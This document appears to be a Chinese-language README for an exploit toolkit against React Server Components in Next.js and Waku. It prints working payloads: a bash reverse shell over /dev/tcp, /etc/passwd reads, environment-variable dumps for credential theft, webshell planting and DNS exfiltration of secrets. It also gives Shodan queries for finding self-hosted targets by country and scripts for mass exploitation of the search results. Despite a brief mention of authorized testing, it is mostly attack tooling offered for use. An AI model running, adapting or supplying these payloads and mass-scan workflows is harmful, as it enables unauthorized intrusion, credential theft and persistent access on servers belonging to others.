针对 React Server Components 漏洞的高级 RCE 利用工具包。具有多个预构建负载、Shodan 集成用于目标发现,以及用于授权渗透测试的批量扫描。
本工具包利用 React 服务端组件(RSC)实现中的关键**远程代码执行(RCE)**漏洞,特别针对:
该漏洞利用 RSC 数据处理机制中的原型污染和不安全反序列化,在服务器上实现任意代码执行。
React 服务端组件使用自定义序列化格式在客户端和服务器之间传输数据。漏洞存在于这些框架反序列化和处理特制载荷的方式中。
攻击链:
$X:constructor:constructor 访问 Function 构造函数_prefix 字段中注入任意 JavaScript攻击者 → 恶意 RSC 载荷 → 目标服务器
↓
不安全反序列化
↓
原型链访问
↓
Function 构造函数
↓
⚠️ 实现 RCE ⚠️
| 载荷 | 描述 | 用途 |
|---|---|---|
console | 基础 PoC(console.log) | 验证漏洞 |
reverseShell | Bash 反弹 Shell | 初始访问 |
readFile | 读取 /etc/passwd | 文件系统访问 |
envDump | 导出环境变量 | 凭证提取 |
execCommand | 执行系统命令 | 任意命令执行 |
webshell | 部署 Express Webshell | 持久化访问 |
exfilPackage | 窃取 package.json | 依赖分析 |
dnsExfil | DNS 外带数据(OOB) | 盲利用 |
git clone https://github.com/yourusername/rsc-rce-exploit.git
cd rsc-rce-exploit
npm install
# 或
yarn install
# 安装 Shodan CLI
pip install shodan
# 使用你的 API 密钥初始化
shodan init YOUR_API_KEY
node rsc-rce-exploit.js --target http://vulnerable-target.com --payload console
# 启动监听器
nc -lvnp 4444
# 执行利用
node rsc-rce-exploit.js \
--target http://vulnerable-target.com \
--payload reverseShell \
--lhost 10.10.14.5 \
--lport 4444
node rsc-rce-exploit.js \
--target http://vulnerable-target.com \
--payload execCommand \
--command "whoami"
node rsc-rce-exploit.js [选项]
| 选项 | 描述 | 必需 |
|---|---|---|
--target <url> | 目标 URL | ✅ |
--framework <名称> | 框架:next 或 waku | ❌(默认:next) |
--payload <名称> | 载荷名称(见下文) | ✅* |
--custom <代码> | 自定义 JavaScript 代码 | ✅* |
--lhost <ip> | 你的 IP(用于反弹 Shell) | ❌ |
--lport <端口> | 你的端口(用于反弹 Shell) | ❌ |
--command <命令> | 要执行的命令 | ❌ |
--endpoint <路径> | 自定义 RSC 端点(Waku) | ❌ |
--action-id <ID> | 自定义 next-action ID | ❌ |
--list | 列出可用载荷 | ❌ |
--verbose | 详细输出 | ❌ |
--help | 显示帮助 | ❌ |
*--payload 或 --custom 必须提供一个
查看所有载荷:
node rsc-rce-exploit.js --list
输出:
📋 可用载荷:
console - 基础 PoC - 控制台输出
代码: console.log(7*7+1)
reverseShell - 反弹 Shell(bash)
代码: require('child_process').exec('bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"')
readFile - 读取 /etc/passwd
代码: console.log(require('fs').readFileSync('/etc/passwd','utf8'))
envDump - 导出环境变量
代码: console.log(JSON.stringify(process.env,null,2))
execCommand - 执行系统命令
代码: console.log(require('child_process').execSync('COMMAND').toString())
webshell - 写入 Webshell 到 /tmp
代码: require('fs').writeFileSync('/tmp/shell.js','...')
exfilPackage - 读取 package.json
代码: console.log(require('fs').readFileSync('./package.json','utf8'))
dnsExfil - DNS 外带数据
代码: require('dns').resolve4(Buffer.from(process.env.SECRET||'nosecret')...)
执行任意 JavaScript 代码:
node rsc-rce-exploit.js \
--target http://target.com \
--custom "require('fs').readdirSync('.').forEach(f=>console.log(f))"
# 基础 Next.js
http.component:"Next.js"
# 带 RSC 的 Next.js
http.html:"__next" http.html:"RSC"
# Next.js 开发模式(更容易受攻击)
http.html:"__NEXT_DATA__" http.html:"development"
# 自托管 Next.js(不在 Vercel 上)
http.component:"Next.js" -org:"Vercel"
# 按地理位置目标(法国)
http.component:"Next.js" country:FR
# 渗透测试终极组合
http.component:"Next.js" http.status:200 country:FR -org:"Vercel" port:3000,8080
# Waku 框架
http.html:"waku" http.html:"RSC"
# Waku RSC 端点
http.path:"/RSC/"
使用提供的自动化脚本:
# 扫描并自动测试
./shodan-scanner.sh "http.component:\"Next.js\" country:FR" 100
# 搭配自定义载荷
./shodan-scanner.sh "http.component:\"Next.js\"" 50 envDump
# 1. 搜索 Shodan
shodan search 'http.component:"Next.js" country:FR' \
--fields ip_str,port,org,hostnames \
--limit 100 > targets.txt
# 2. 测试每个目标
while read -r line; do
ip=$(echo $line | awk '{print $1}')
port=$(echo $line | awk '{print $2}')
echo "[*] Testing http://$ip:$port"
node rsc-rce-exploit.js \
--target "http://$ip:$port" \
--payload console
done < targets.txt
mass-exploit.js 工具可以测试多个目标:
# 从文件读取
node mass-exploit.js --file targets.txt --payload console --threads 10
# 从 Shodan 读取
node mass-exploit.js --shodan "http.component:\"Next.js\"" --limit 50 --payload envDump
# 保存结果
node mass-exploit.js --file targets.txt --payload console --output results.json
自动化安全测试示例:
# .github/workflows/security-test.yml
name: RSC 安全测试
on: [push]
jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- run: npm install
- run: node rsc-rce-exploit.js --target http://staging.example.com --payload console
node rsc-rce-exploit.js \
--target https://vulnerable.example.com \
--payload console
预期输出:
╔═══════════════════════════════════════════════════════════╗
║ RSC RCE 漏洞利用工具 - 增强版 ║
║ React 服务端组件代码执行 ║
╚═══════════════════════════════════════════════════════════╝
[*] 开始利用...
[*] 定位 Next.js RSC 端点...
[*] URL: https://vulnerable.example.com
[*] 载荷: console.log(7*7+1)...
[+] 响应状态: 200
[+] 响应体:
50
[*] 利用完成!
node rsc-rce-exploit.js \
--target https://api.target.com \
--payload envDump
结果:
process.env 变量# 终端 1:启动监听器
nc -lvnp 4444
# 终端 2:执行利用
node rsc-rce-exploit.js \
--target https://vulnerable.example.com \
--payload reverseShell \
--lhost 10.10.14.5 \
--lport 4444
node rsc-rce-exploit.js \
--target https://vulnerable.example.com \
--payload webshell
# 访问 Web Shell
curl "http://vulnerable.example.com:9999/cmd?c=whoami"